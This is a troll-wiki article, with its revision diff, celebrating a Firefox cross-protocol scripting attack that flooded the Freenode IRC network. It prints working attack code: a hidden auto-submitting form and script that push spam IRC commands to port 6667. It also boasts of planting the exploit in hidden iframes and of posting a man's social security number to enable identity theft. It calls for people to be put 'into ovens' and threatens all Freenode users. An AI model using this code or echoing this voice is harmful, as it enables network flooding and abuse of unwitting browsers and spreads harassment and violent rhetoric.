Registration has been disabled and the moderation extension has been turned off.

Contact an admin on Discord or EDF if you want an account. Also fuck bots.

Firefox XPS IRC Attack: Difference between revisions

From Encyclopedia Dramatica
Jump to navigation Jump to search
imported>JuniusThaddeus
.com to .ch
imported>Uberfukken
No edit summary
 
(12 intermediate revisions by 6 users not shown)
Line 1: Line 1:
[[Image:Goatse security.png|center]]
[[Image:Goatse security.png|center]]
<center><font size="5">[http://security.goatse.fr/ GOATSE SECURITY] TEAM 0-DAY EXPLOIT ADVISORY</font></center>
<center><font size="5">[http://security.goatse.fr/ GOATSE SECURITY] TEAM 0-DAY EXPLOIT ADVISORY</font></center>


<center>irc.hardchats.com #gnaa to discuss security consulting arrangements</center>
<center>irc.gnaa.eu #gnaa to discuss security consulting arrangements</center>
[[Image:Freenode_spam_header.jpg|right]]
<!--[[Image:Freenode_spam_header.jpg|right]] -->


Since it's been copied to much less sweet websites (without credit or sourcing), it's time to write up a security advisory (I believe the publishing of infosec advisories is a first for Encyclopedia Dramatica, [[lulz]]) and let everybody know whats up. [[Firefox]] has a hole in its port blocking scheme that allows a clever [[troll]] to spam an unsuspecting IRC daemon with whatever he desires. The [[GNAA]] leveraged this vulnerability to bring complete ruin upon the [[Freenode]] [[IRC]] network.
Since it's been copied to much less sweet websites (without credit or sourcing), it's time to write up a security advisory (I believe the publishing of infosec advisories is a first for Encyclopedia Dramatica, [[lulz]]) and let everybody know whats up. [[Firefox]] has a hole in its port blocking scheme that allows a clever [[troll]] to spam an unsuspecting IRC daemon with whatever he desires. The [[GNAA]] leveraged this vulnerability to bring complete ruin upon the [[Freenode]] [[IRC]] network.
Line 10: Line 11:
A new implementation of [http://www.kb.cert.org/vuls/id/476267 cross-protocol scripting] was used to automatically fill a HTTP form to send a POST to port 6667 and shove a bunch of IRC commands down the socket. Although Mozilla [http://www.mozilla.org/projects/netlib/PortBanning.html banned most of the fun ports] years ago, 6667 -- the default port for IRC servers, wasn't on the list. In all likelihood, this the first use of this attack in the wild, ever.
A new implementation of [http://www.kb.cert.org/vuls/id/476267 cross-protocol scripting] was used to automatically fill a HTTP form to send a POST to port 6667 and shove a bunch of IRC commands down the socket. Although Mozilla [http://www.mozilla.org/projects/netlib/PortBanning.html banned most of the fun ports] years ago, 6667 -- the default port for IRC servers, wasn't on the list. In all likelihood, this the first use of this attack in the wild, ever.


This attack has a lot of implications outside of IRC. Think of all the other TCP ports that are in common use these days that aren't covered in Mozilla's banned list. Most protocols do not use a cookied handshake of any sort to initiate a connection. The sheer amount of potential that exists in turning a web browser into a device speaking an arbitrary protocol is huge. For example, SIP protocol can run on TCP these days. You can make someone's web browser interact with a SIP device. All sorts of potentially criminal and civil liability generating applications. Expect more of them to appear out of the GNAA labs in the future!{{cs|SectionOne|Example source (click plus to uncollapse)|<br><pre><form action="http://irc.freenode.net:6667/" method="post" enctype="text/plain">  
This attack has a lot of implications outside of IRC. Think of all the other TCP ports that are in common use these days that aren't covered in Mozilla's banned list. Most protocols do not use a cookied handshake of any sort to initiate a connection. The sheer amount of potential that exists in turning a web browser into a device speaking an arbitrary protocol is huge. For example, SIP protocol can run on TCP these days. You can make someone's web browser interact with a SIP device. All sorts of potentially criminal and civil liability generating applications. Expect more of them to appear out of the GNAA labs in the future!
 
{{cs|SectionOne|Example source (click plus to uncollapse)|<br><pre><form action="http://irc.freenode.net:6667/" method="post" enctype="text/plain">  
<textarea style="display:none" id="x" name="x"></textarea>
<textarea style="display:none" id="x" name="x"></textarea>
<input type="submit" style="display:none;" />
<input type="submit" style="display:none;" />
Line 27: Line 30:
i=randomString(Math.floor(Math.random()*10+3));
i=randomString(Math.floor(Math.random()*10+3));
te=document.getElementById('x');
te=document.getElementById('x');
te.value = '\nUSER '+i+' 8 * :'+n+'\nNICK '+n+'\nJOIN #freenode\n'+new Array(99).join('PRIVMSG #freenode :Protect your rights online! Do not be squished by the leaders! Support the GNAA at irc.hardchats.com #gnaa ....... My name is '+n+', and I hope you have a nice day.\n');
te.value = '\nUSER '+i+' 8 * :'+n+'\nNICK '+n+'\nJOIN #freenode\n'+new Array(99).join('PRIVMSG #freenode :Protect your rights online! Do not be squished by the leaders! Support the GNAA at irc.gnaa.eu #gnaa ....... My name is '+n+', and I hope you have a nice day.\n');
te.parentNode.submit()
te.parentNode.submit()
</script> </pre>|0}}
</script> </pre>|0}}
Line 36: Line 39:
*Mozilla suite affected, all versions
*Mozilla suite affected, all versions
*Possibly others affected
*Possibly others affected
*[[Microsoft]] [[Internet Explorer]], [[Apple]] Safari '''unaffected'''. [[Truth|Because closed-source commercial products are simply better.]]  
*[[Microsoft]] [[Internet Explorer]], [[Apple]] Safari '''unaffected'''. [[Lie|Because closed-source commercial products are simply better.]]  
[[Image:Shouldausedirssi.jpg|thumb|right|Should have used [[Irssi|a real IRC client]].]]
<!-- [[Image:Shouldausedirssi.jpg|thumb|right|Should have used [[Irssi|a real IRC client]].]] -->


==IRCD rundown==
==IRCD rundown==
*Efnet, no longer affected (took them about an hour to enact countermeasures
*Efnet, no longer affected (took them about an hour to enact countermeasures)
*[[Buttes]]net, no longer affected. (took them about 4 hours to enact countermeaures)
*[[Buttes]]net, no longer affected. (took them about 4 hours to enact countermeaures)
*OFTC, no longer affected (took them about a day)
*OFTC, no longer affected (took them about a day)
*Freenode, over 1 month to enact countermeasures with a server upgrade from Hyperion to ircd-seven,  after which they immediately got raped by GNAA. (LOL)
*Freenode, over 1 month to enact countermeasures with a server upgrade from Hyperion to ircd-seven,  after which they immediately got raped by GNAA. (LOL)


==Attack mitigation==
<!--==Attack mitigation==
You'll want to use iptables u32 to skip over the IP and TCP headers of the packet, and match the first 4 bytes of the packet against "POST", like so:
You'll want to use iptables u32 to skip over the IP and TCP headers of the packet, and match the first 4 bytes of the packet against "POST", like so:
<pre>-m u32 --u32 0x0>>0x16&0x3c@0xc>>0x1a&0x3c@0x0=0x504f5354 -m recent --set --name lastmeasure --rsource -j DROP</pre>
<pre>-m u32 --u32 0x0>>0x16&0x3c@0xc>>0x1a&0x3c@0x0=0x504f5354 -m recent --set --name lastmeasure --rsource -j DROP</pre>
One command. Seriously. Any linux machine you can drop in this single line into your iptables configuration and boom, you've stopped the attack. This is what EFnet did. This is what [[Buttes]]net did (which has exactly ONE lazy stoner administrating it). You break out tcpdump, you look at what is going on, you block it in iptables. This is what Freenode could not do, because they don't know anything about anything. Also, you'll want a rule to make sure any subsequent traffic refreshes the drop entry:
One command. Seriously. Any linux machine you can drop in this single line into your iptables configuration and boom, you've stopped the attack. This is what EFnet did. This is what [[Buttes]]net did (which has exactly ONE lazy stoner administrating it). You break out tcpdump, you look at what is going on, you block it in iptables. This is what Freenode could not do, because they don't know anything about anything. Also, you'll want a rule to make sure any subsequent traffic refreshes the drop entry:
<pre>-m recent --update --seconds 86400 --name lastmeasure --rsource -j DROP</pre>
<pre>-m recent --update --seconds 86400 --name lastmeasure --rsource -j DROP</pre>
-->


==Best things that were done to Freenode==
==Best things that were done to Freenode==
[[Image:Cause.png|thumb|right|Secret Last Measure IRC flood administration panel]]
<!-- [[Image:Cause.png|thumb|right|Secret Last Measure IRC flood administration panel]] -->
*Embedded exploit in hidden iframes in [[Last Measure|everyone's favorite shock site]], leading to thousands of hosts joining network.
*Embedded exploit in hidden iframes in [[Last Measure|everyone's favorite shock site]], leading to thousands of hosts joining network.
*Messaged Freenode opers blog links with hidden iframes and watched as they all k-lined eachother
*Messaged Freenode opers blog links with hidden iframes and watched as they all k-lined eachother
Line 58: Line 62:
[[Image:Effect.jpg|thumb|right|How it appears in the [[irssi|IRC client of rich and beautiful people.]]]]
[[Image:Effect.jpg|thumb|right|How it appears in the [[irssi|IRC client of rich and beautiful people.]]]]
*Switched up the floods to CTCP and made users flood themselves off with CTCP replies over and over again until they were k-lined from servers with reconnect limits.
*Switched up the floods to CTCP and made users flood themselves off with CTCP replies over and over again until they were k-lined from servers with reconnect limits.
[[Image:Ctcpklined.png|center]]
<!-- [[Image:Ctcpklined.png|center]] -->
*Flooded freenode with channel names full of legitimate users implying they were troll channels, [[:File:Badchannelbanlol.png|making paranoid freenode ops ban their own legitimate users.]]
*Flooded freenode with channel names full of legitimate users implying they were troll channels, <!--File:Badchannelbanlol.png -->making paranoid freenode ops ban their own legitimate users.
[[Image:Freenodebigkill2.jpg|thumb|right|You donated previously? [[Retard]].]]
<!-- [[Image:Freenodebigkill2.jpg|thumb|right|You donated previously? [[Retard]].]] -->
*After seeing a Freenode staff member make a bot that automatically k-lined flooding users in a channel with wildcards, manually flooded the channel from a shell account and watched it ban an entire TLD, taking a gigantic swath of the network with it.
*After seeing a Freenode staff member make a bot that automatically k-lined flooding users in a channel with wildcards, manually flooded the channel from a shell account and watched it ban an entire TLD, taking a gigantic swath of the network with it.
[[Image:Freenodebigkill3.jpg|center]]
<!-- [[Image:Freenodebigkill3.jpg|center]]
[[Image:Freenodebigkill4.jpg|thumb|right|[[K-line]]d *!*@*.net. You know, the usual.]]
[[Image:Freenodebigkill4.jpg|thumb|right|[[K-line]]d *!*@*.net. You know, the usual.]]
[[Image:Freenodebigkill1.jpg|center]]
[[Image:Freenodebigkill1.jpg|center]] -->
*Made Freenode staff xenophobic and paranoid and watched them k-line anyone who dared ask for assistance or complain about the floods.
*Made Freenode staff xenophobic and paranoid and watched them k-line anyone who dared ask for assistance or complain about the floods.
[[Image:Lolklined4reporting.jpg|center]]
<!-- [[Image:Lolklined4reporting.jpg|center]] -->
*Making Freenode users self-propagate the link on third party blogging services with warnings to not click the link (we got huge referrals from Twitter, thanks dudes)
*Making Freenode users self-propagate the link on third party blogging services with warnings to not click the link (we got huge referrals from Twitter, thanks dudes)
[[Image:Referrals2.jpg|center]]
<!-- [[Image:Referrals2.jpg|center]]
[[Image:Referrals1.jpg|center]]
[[Image:Referrals1.jpg|center]] -->


==You are mean. why did you torture freenode so much?==
==You are mean. Why did you torture freenode so much?==
[[Image:Ballsinjar.jpg|thumb|right|Also, Freenode users get so mad. That's reason enough alone. [[Lulz]].]]
<!-- [[Image:Ballsinjar.jpg|thumb|right|Also, Freenode users get so mad. That's reason enough alone. [[Lulz]].]] -->
Freenode/PDPC is a fucking fraud. In the entire time it has existed, it has never released financial statements. [[Rob Levin]] used PDPC to embezzle hundreds of thousands of dollars which should have been given to open source development projects. He faked his death, and came back in this "christel" incarnation in Europe to continue embezzling from Freenode. It is all a big lie, and these people should be thrown into ovens. EFnet continuously hosts 100x the number of users that Freenode does without constant netsplits and incidents. OFTC does not sit there and continuously beg for money. Get off of Freenode. Go to somewhere that is ethical.
Freenode/PDPC is a fucking fraud. In the entire time it has existed, it has never released financial statements. [[Rob Levin]] used PDPC to embezzle hundreds of thousands of dollars which should have been given to open source development projects. He faked his death, and came back in this "christel" incarnation in Europe to continue embezzling from Freenode. It is all a big lie, and these people should be thrown into ovens. EFnet continuously hosts 100x the number of users that Freenode does without constant netsplits and incidents. OFTC does not sit there and continuously beg for money. Get off of Freenode. Go to somewhere that is ethical.


Line 95: Line 99:
*[http://www.azpoint.net/software/sicurezza/18247/Mozilla-bug-manda-in-crisi-Freenode-IRC.asp AZPoint, ''Mozilla: bug manda in crisi Freenode IRC''], Italian
*[http://www.azpoint.net/software/sicurezza/18247/Mozilla-bug-manda-in-crisi-Freenode-IRC.asp AZPoint, ''Mozilla: bug manda in crisi Freenode IRC''], Italian
*[http://www.logiciel.net/une-faille-firefox-utilisee-pour-attaquer-freenode-un-reseau-irc-4864.htm Logiciel, ''Une faille Firefox utilisée pour attaquer Freenode, un réseau IRC''], French
*[http://www.logiciel.net/une-faille-firefox-utilisee-pour-attaquer-freenode-un-reseau-irc-4864.htm Logiciel, ''Une faille Firefox utilisée pour attaquer Freenode, un réseau IRC''], French
 
<!--
==Wall of whining bloggers==
==Wall of whining bloggers==
[[Image:btweet1.jpg|thumb|right|LOL FREENODE]]
[[Image:btweet1.jpg|thumb|right|LOL FREENODE]]
Line 118: Line 122:
[[Image:tweet10.jpg|center]]
[[Image:tweet10.jpg|center]]
[[Image:tweet11.jpg|center]]
[[Image:tweet11.jpg|center]]
{{haxor}}
[[Image:tweet12.jpg|center]]
[[Image:tweet12.jpg|center]]
[[Image:tweet13.jpg|center]]
[[Image:tweet13.jpg|center]]
[[Image:Gnaa-nostalgia.jpg|thumb|right|Aww, we love you too <3]]
[[Image:Gnaa-nostalgia.jpg|thumb|right|Aww, we love you too <3]]
[[Image:tweet14.jpg|center]]
[[Image:tweet14.jpg|center]]
 
-->
 
{{gnaa}}
{{epic}}
{{programming}}
{{ircseries}}
{{ircseries}}
{{softwarez}}


{{Timeline|Featured article March 7, [[2010]]|[[HOW CAN SHE SLAP?!?]]|[[Firefox XPS IRC Attack]]|[[American Family Association]]}}
{{Timeline|Featured article March 7, [[2010]]|[[HOW CAN SHE SLAP?!?]]|[[Firefox XPS IRC Attack]]|[[American Family Association]]}}


[[Category:Trolls]][[Category:Softwarez]][[Category:Internets Phenomena]][[Category:Drama-generating techniques]][[Category:2010]]
[[Category:Trolls]]
[[Category:Softwarez]]
[[Category:Internets Phenomena]]
[[Category:Drama-generating techniques]]
[[Category:2010]]

Latest revision as of 22:22, 13 March 2019

GOATSE SECURITY TEAM 0-DAY EXPLOIT ADVISORY
irc.gnaa.eu #gnaa to discuss security consulting arrangements

Since it's been copied to much less sweet websites (without credit or sourcing), it's time to write up a security advisory (I believe the publishing of infosec advisories is a first for Encyclopedia Dramatica, lulz) and let everybody know whats up. Firefox has a hole in its port blocking scheme that allows a clever troll to spam an unsuspecting IRC daemon with whatever he desires. The GNAA leveraged this vulnerability to bring complete ruin upon the Freenode IRC network.

How it works

A new implementation of cross-protocol scripting was used to automatically fill a HTTP form to send a POST to port 6667 and shove a bunch of IRC commands down the socket. Although Mozilla banned most of the fun ports years ago, 6667 -- the default port for IRC servers, wasn't on the list. In all likelihood, this the first use of this attack in the wild, ever.

This attack has a lot of implications outside of IRC. Think of all the other TCP ports that are in common use these days that aren't covered in Mozilla's banned list. Most protocols do not use a cookied handshake of any sort to initiate a connection. The sheer amount of potential that exists in turning a web browser into a device speaking an arbitrary protocol is huge. For example, SIP protocol can run on TCP these days. You can make someone's web browser interact with a SIP device. All sorts of potentially criminal and civil liability generating applications. Expect more of them to appear out of the GNAA labs in the future!

[-+]Example source (click plus to uncollapse)



<form action="http://irc.freenode.net:6667/" method="post" enctype="text/plain"> 
<textarea style="display:none" id="x" name="x"></textarea>
<input type="submit" style="display:none;" />
</form>
<script type="text/javascript">
function randomString(length) {
        var chars = "abcdefghiklmnopqrstuvwxyz";
        var randomstring = '';
        for (var i=0; i<length; i++) {
                var rnum = Math.floor(Math.random() * chars.length);
                randomstring += chars.substring(rnum,rnum+1);
        }
        return randomstring;
}
n=randomString(Math.floor(Math.random()*10+3));
i=randomString(Math.floor(Math.random()*10+3));
te=document.getElementById('x');
te.value = '\nUSER '+i+' 8 * :'+n+'\nNICK '+n+'\nJOIN #freenode\n'+new Array(99).join('PRIVMSG #freenode :Protect your rights online! Do not be squished by the leaders! Support the GNAA at irc.gnaa.eu #gnaa ....... My name is '+n+', and I hope you have a nice day.\n');
te.parentNode.submit()
</script> 

Browser rundown

IRCD rundown

  • Efnet, no longer affected (took them about an hour to enact countermeasures)
  • Buttesnet, no longer affected. (took them about 4 hours to enact countermeaures)
  • OFTC, no longer affected (took them about a day)
  • Freenode, over 1 month to enact countermeasures with a server upgrade from Hyperion to ircd-seven, after which they immediately got raped by GNAA. (LOL)


Best things that were done to Freenode

  • Embedded exploit in hidden iframes in everyone's favorite shock site, leading to thousands of hosts joining network.
  • Messaged Freenode opers blog links with hidden iframes and watched as they all k-lined eachother
What the attack looks like to a Typical Macintosh User
How it appears in the IRC client of rich and beautiful people.
  • Switched up the floods to CTCP and made users flood themselves off with CTCP replies over and over again until they were k-lined from servers with reconnect limits.
  • Flooded freenode with channel names full of legitimate users implying they were troll channels, making paranoid freenode ops ban their own legitimate users.
  • After seeing a Freenode staff member make a bot that automatically k-lined flooding users in a channel with wildcards, manually flooded the channel from a shell account and watched it ban an entire TLD, taking a gigantic swath of the network with it.
  • Made Freenode staff xenophobic and paranoid and watched them k-line anyone who dared ask for assistance or complain about the floods.
  • Making Freenode users self-propagate the link on third party blogging services with warnings to not click the link (we got huge referrals from Twitter, thanks dudes)

You are mean. Why did you torture freenode so much?

Freenode/PDPC is a fucking fraud. In the entire time it has existed, it has never released financial statements. Rob Levin used PDPC to embezzle hundreds of thousands of dollars which should have been given to open source development projects. He faked his death, and came back in this "christel" incarnation in Europe to continue embezzling from Freenode. It is all a big lie, and these people should be thrown into ovens. EFnet continuously hosts 100x the number of users that Freenode does without constant netsplits and incidents. OFTC does not sit there and continuously beg for money. Get off of Freenode. Go to somewhere that is ethical.

Beyond that, the trolling scene has a lot invested in ruining Freenode. I posted Rob Levin's social security number, enabling the series of identity thefts and ruins that forced the man to fake his death. With Bantown, I watched Jmax sniff lilo's oper block password off the wire and absolutely wreck the network in it. I also watched Grog (of the GNAA at the time, until he was excommunicated by the former tyrant timecop) convince lilo that he was the founder of MySQL, get opered up, wreck the network. Then he convinced lilo that his daughter's computer was hacked, apologized, got his o:line back and wrecked the network again.

In short, wrecking Freenode is a long and glorious troll tradition that stretches backwards for time immemorial. If you associate with Freenode, use Freenode, or support Freenode, you are a target. You are asking to be destroyed.

See Also

Non-English sources

Firefox XPS IRC Attack is part of a series on the Gay Nigger Association of America.

MembersVictoriesRelated

BLACK_MANDiKKyfl0ssGrogHipcrimejesuitxJmaxl0deLiteralKaMeepsheepOliver HartRucasslothTimecopweev

Firefox XPS IRC Attack
is part of a series on
epic events and trolls
Epic Win

2011 Norway attacks2012 GNAA Tumblr RuinAFI IncidentAgile2013/b/lackup/b/spaceBadfurDay VS. DeviantARTBullet to the Head of the NRAChan DeathThe Chanology ExperimentsCosmicJohn CL Experiment#Cut4BieberdAmn ExploitDeviantART Policy ChangesDub the DewEbola-chan#ExilePitbullThe FappeningFirefox XPS IRC AttackGuatemala DayHabbo Raid 2006Habbo Raid 2007He Will Not Divide UsHitler TopTensHitler: The Babe WithinInternet Vigilante GroupJEWS DID WTCJudith Park's Leaked PhotosLiveJournal Buyout 2005LiveJournal Buyout 2007LiveJournal StrikethroughLJ Abuse ConspiracyMuhammed Sex Simulator 2015Old /b/ DayOlympic FlameOperation LIONCASHOperation YouTubePokéclipsePROJECT CHANOLOGYPwnest PetersRFJason CL ExperimentThe Rolling : MTV Gets Rickroll'd#SANDYLOOTCREWSharecash DDoSWaterproof iOS7Y!Gallery Bans AnthroYouTube Civil WarYouTube Furry War

Epic Fail

4chan 2025 MegaHack4chan's Death and Revival/b/-day/b/'s CancerBoston Fail PartyChanocalypse NaowDshockerThe ED Civil WarEm/b/assy Security LeakGoddessTrinityThe Great Hack Of FacepunchThe Great ImageFap Troll[email protected]Italian Wikipedia Publicity StuntOperation AntfuckOperation AwesomeOperation Blue CrayonOperation Falcon PunchOperation Timebomb v2Penis Pump Sex Scandal '06Perfection GirlRe/b/ootShayminSonic-cide

Firefox XPS IRC Attack is part of a series on Programming.

[2 L337 4 MEEnter the Matrix]

ADAAssemblyCC++COBOLDebugDOSErlangErrorFdiskFortranIntegerJavaLOLCodeMachine CodeMatlabMIRC ScriptMUMPSOpen SourcePerlPHPProgramming languagePythonQBASICRuby on RailsScratchSSHVisual Basic

Hacks

Firefox XPS IRC AttackSafari XPS Attack Sandworm

Programmers

Bill GatesLinus TorvaldsWeevGoatse SecurityTerry DavisTheo de Raadt

Other Topics

Operating systemWarezNotepadIs not a bug, it's a featureDatabase Error

Firefox XPS IRC Attack

is part of a series on

IRC

Please visit the IRC PORTAL for more


A-BC-DE-FG-HI-JK-LM-NO-P
Q-RS-TU-VW-XY-Z#

Firefox XPS IRC Attack is part of a series on

Softwarez

Visit the Softwarez Portal for complete coverage.


Featured article March 7, 2010
Preceded by
HOW CAN SHE SLAP?!?
Firefox XPS IRC Attack Succeeded by
American Family Association